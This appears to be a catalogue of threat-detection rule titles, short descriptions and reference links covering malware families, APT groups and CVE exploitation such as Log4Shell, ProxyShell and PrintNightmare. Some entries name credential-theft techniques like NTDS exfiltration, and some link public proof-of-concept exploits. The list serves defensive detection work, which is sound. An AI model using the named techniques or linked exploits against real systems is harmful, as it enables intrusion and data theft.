Chafer Malware URL Pattern Detects HTTP request used by Chafer malware to receive data from its C2. https://securelist.com/chafer-used-remexi-malware/89538/
Potential Dridex Activity Detects potential Dridex acitvity via specific process patterns https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3, https://redcanary.com/threat-detection-report/threats/dridex/
Potential Dtrack RAT Activity Detects potential Dtrack RAT activity via specific process patterns https://securelist.com/my-name-is-dtrack/93338/, https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/, https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/, https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/, https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/
Potential Emotet Activity Detects all Emotet like process executions that are not covered by the more generic rules https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/, https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/, https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/, https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/
Formbook Process Creation Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer, https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/, https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/, https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/
LockerGoga Ransomware Activity Detects LockerGoga ransomware activity via specific command line. https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a, https://blog.f-secure.com/analysis-of-lockergoga-ransomware/, https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
Potential QBot Activity Detects potential QBot activity by looking for process executions used previously by QBot https://twitter.com/killamjr/status/1179034907932315648, https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
Potential Ryuk Ransomware Activity Detects Ryuk ransomware activity https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/, https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
Potential Snatch Ransomware Activity Detects specific process characteristics of Snatch ransomware word document droppers https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
Ursnif Malware C2 URL Pattern Detects Ursnif C2 traffic. https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html
Ursnif Malware Download URL Pattern Detects download of Ursnif malware done by dropper documents. https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware
Potential Ursnif Malware Activity - Registry Detects registry keys related to Ursnif malware. https://blog.yoroi.company/research/ursnif-long-live-the-steganography/, https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg
APT31 Judgement Panda Activity Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
APT40 Dropbox Tool User Agent Detects suspicious user agent string of APT40 Dropbox tool Internal research from Florian Roth
Potential Russian APT Credential Theft Activity Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
Potential EmpireMonkey Activity Detects potential EmpireMonkey APT activity https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/, https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider
Equation Group DLL_U Export Function Load Detects a specific export function name used by one of EquationGroup tools https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=, https://twitter.com/cyb3rops/status/972186477512839170
Mustang Panda Dropper Detects specific process parameters as used by Mustang Panda droppers https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/, https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
Operation Wocao Activity Detects activity mentioned in Operation Wocao report https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://twitter.com/SBousseaden/status/1207671369963646976
Operation Wocao Activity - Security Detects activity mentioned in Operation Wocao report https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf, https://twitter.com/SBousseaden/status/1207671369963646976
CVE-2020-0688 Exploitation Attempt Detects CVE-2020-0688 Exploitation attempts https://github.com/Ridter/cve-2020-0688
CVE-2020-0688 Exchange Exploitation via Web Log Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
CVE-2020-0688 Exploitation via Eventlog Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/, https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/
CVE-2020-10148 SolarWinds Orion API Auth Bypass Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts https://kb.cert.org/vuls/id/843464
DNS RCE CVE-2020-1350 Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/, https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html
Potential Emotet Rundll32 Execution Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html, https://cyber.wtf/2021/11/15/guess-whos-back/
CVE-2020-5902 F5 BIG-IP Exploitation Attempt Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902 https://support.f5.com/csp/article/K52145254, https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/, https://twitter.com/yorickkoster/status/1279709009151434754, https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195 https://support.citrix.com/article/CTX276688, https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/, https://dmaasland.github.io/posts/citrix.html
ComRAT Network Communication Detects Turla ComRAT network communication. https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC Detects the execution of the commonly used ZeroLogon PoC executable. https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Suspicious PrinterPorts Creation (CVE-2020-1048) Detects new commands that add new printer port which point to suspicious file https://windows-internals.com/printdemon-cve-2020-1048/
Exploited CVE-2020-10189 Zoho ManageEngine Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html, https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. https://windows-internals.com/printdemon-cve-2020-1048/
TerraMaster TOS CVE-2020-28188 Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188 https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/, https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
Blue Mockingbird Attempts to detect system changes made by Blue Mockingbird https://redcanary.com/blog/blue-mockingbird-cryptominer/
GALLIUM IOCs Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml
Potential Maze Ransomware Activity Detects specific process characteristics of Maze ransomware word document droppers https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/, https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
Trickbot Malware Activity Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
Potential Ke3chang/TidePool Malware Activity Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
EvilNum APT Golden Chickens Deployment Via OCX Files Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/, https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
Cisco ASA FTD Exploit CVE-2020-3452 Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation) https://twitter.com/aboul3la/status/1286012324722155525, https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter
FlowCloud Registry Markers Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
Oracle WebLogic Exploit CVE-2020-14882 Detects exploitation attempts on WebLogic servers https://isc.sans.edu/diary/26734, https://twitter.com/jas502n/status/1321416053050667009?s=20, https://twitter.com/sudo_sudoka/status/1323951871078223874
Lazarus Group Activity Detects different process execution behaviors as described in various threat reports on Lazarus group activity https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/, https://www.hvs-consulting.de/lazarus-report/
GALLIUM Artefacts - Builtin Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
Leviathan Registry Key Activity Detects registry key used by Leviathan APT in Malaysian focused campaign https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
Solarwinds SUPERNOVA Webshell Access Detects access to SUPERNOVA webshell as described in Guidepoint report https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/, https://www.anquanke.com/post/id/226029
UNC2452 Process Creation Patterns Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
Greenbug Espionage Group Indicators Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
UNC2452 PowerShell Pattern Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware, https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
Suspicious VBScript UN2452 Pattern Detects suspicious inline VBScript keywords as used by UNC2452 https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
TAIDOOR RAT DLL Load Detects specific process characteristics of Chinese TAIDOOR RAT malware load https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
Winnti Malware HK University Campaign Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
Winnti Pipemon Characteristics Detects specific process characteristics of Winnti Pipemon malware reported by ESET https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
CVE-2021-31979 CVE-2021-33771 Exploits Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
Arcadyan Router Exploitations Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2, https://www.tenable.com/security/research/tra-2021-13, https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
Possible Exploitation of Exchange RCE CVE-2021-42321 Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321
Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . https://twitter.com/mvelazco/status/1410291741241102338, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
CVE-2021-1675 Print Spooler Exploitation Filename Pattern Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://github.com/cube0x0/CVE-2021-1675
Possible CVE-2021-1675 Print Spooler Exploitation Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://twitter.com/fuzzyf10w/status/1410202370835898371
CVE-2021-1675 Print Spooler Exploitation Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 https://twitter.com/MalwareJake/status/1410421967463731200
CVE-2021-1675 Print Spooler Exploitation IPC Access Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 https://twitter.com/INIT_3/status/1410662463641731075
Oracle WebLogic Exploit CVE-2021-2109 Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109 https://twitter.com/pyn3rd/status/1351696768065409026, https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
CVE-2021-21972 VSphere Exploitation Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 https://www.vmware.com/security/advisories/VMSA-2021-0002.html, https://f5.pm/go-59627.html, https://swarm.ptsecurity.com/unauth-rce-vmware
CVE-2021-21978 Exploitation Attempt Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978 https://twitter.com/wugeej/status/1369476795255320580, https://paper.seebug.org/1495/
VMware vCenter Server File Upload CVE-2021-22005 Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server. https://kb.vmware.com/s/article/85717, https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server
Fortinet CVE-2021-22123 Exploitation Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection
Pulse Connect Secure RCE Attack CVE-2021-22893 This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html, https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784
Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 https://nvd.nist.gov/vuln/detail/CVE-2021-26084, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://github.com/h3v0x/CVE-2021-26084_Confluence
Potential CVE-2021-26084 Exploitation Attempt Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md, https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/
Exploitation of CVE-2021-26814 in Wazuh Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814 https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py
Potential CVE-2021-26857 Exploitation Attempt Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
CVE-2021-26858 Exchange Exploitation Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
ProxyLogon Reset Virtual Directories Based On IIS Log When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
Potential CVE-2021-27905 Exploitation Attempt Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1. https://twitter.com/Al1ex4/status/1382981479727128580, https://twitter.com/sec715/status/1373472323538362371, https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/, https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186, https://github.com/murataydemir/CVE-2021-27905
Exchange Exploitation CVE-2021-28480 Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 https://twitter.com/GossiTheDog/status/1392965209132871683?s=20
CVE-2021-33766 Exchange ProxyToken Exploitation Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
Serv-U Exploitation CVE-2021-35211 by DEV-0322 Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
Suspicious Word Cab File Write CVE-2021-40444 Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 https://twitter.com/RonnyTNL/status/1436334640617373699?s=20, https://twitter.com/vanitasnk/status/1437329511142420483?s=21
Potential CVE-2021-40444 Exploitation Attempt Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444, https://twitter.com/neonprimetime/status/1435584010202255375, https://www.joesandbox.com/analysis/476188/1/iochtml
Potential Exploitation Attempt From Office Application Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) https://twitter.com/sbousseaden/status/1531653369546301440, https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190
ADSelfService Exploitation Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 https://us-cert.cisa.gov/ncas/alerts/aa21-259a
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/, https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html, https://us-cert.cisa.gov/ncas/alerts/aa21-259a
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
Potential CVE-2021-41379 Exploitation Attempt Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/, https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/
LPE InstallerFileTakeOver PoC CVE-2021-41379 Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379 https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-41773 Exploitation Attempt Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. https://nvd.nist.gov/vuln/detail/CVE-2021-41773, https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782, https://twitter.com/ptswarm/status/1445376079548624899, https://twitter.com/h4x0r_dz/status/1445401960371429381, https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml, https://twitter.com/bl4sty/status/1445462677824761878
Sitecore Pre-Auth RCE CVE-2021-42237 Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx https://blog.assetnote.io/2021/11/02/sitecore-rce/, https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
Potential CVE-2021-42278 Exploitation Attempt The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
Suspicious Computer Account Name Change CVE-2021-42287 Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45
Grafana Path Traversal Exploitation CVE-2021-43798 Detects a successful Grafana path traversal exploitation https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/, https://github.com/search?q=CVE-2021-43798
CVE-2021-44077 POC Default Dropped File Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py
Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j. https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability, https://twitter.com/TheDFIRReport/status/1482078434327244805, https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/
Log4j RCE CVE-2021-44228 Generic Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21
Log4j RCE CVE-2021-44228 in Fields Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21
Exchange ProxyShell Pattern Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
Suspicious RazerInstaller Explorer Subprocess Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM https://twitter.com/j0nh4t/status/1429049506021138437, https://streamable.com/q2dsji
Successful Exchange ProxyShell Attack Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
Potential SystemNightmare Exploitation Attempt Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM https://github.com/GossiTheDog/SystemNightmare
SonicWall SSL/VPN Jarrewrite Exploitation Detects exploitation attempts of the SonicWall Jarrewrite Exploit https://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/, https://github.com/darrenmartyn/VisualDoor
Potential BlackByte Ransomware Activity Detects command line patterns used by BlackByte ransomware in different operations https://redcanary.com/blog/blackbyte-ransomware/
Conti Volume Shadow Listing Detects a command used by conti to find volume shadow backups https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
Conti NTDS Exfiltration Command Detects a command used by conti to exfiltrate NTDS https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
Potential Conti Ransomware Activity Detects a specific command used by the Conti ransomware group https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/, https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19
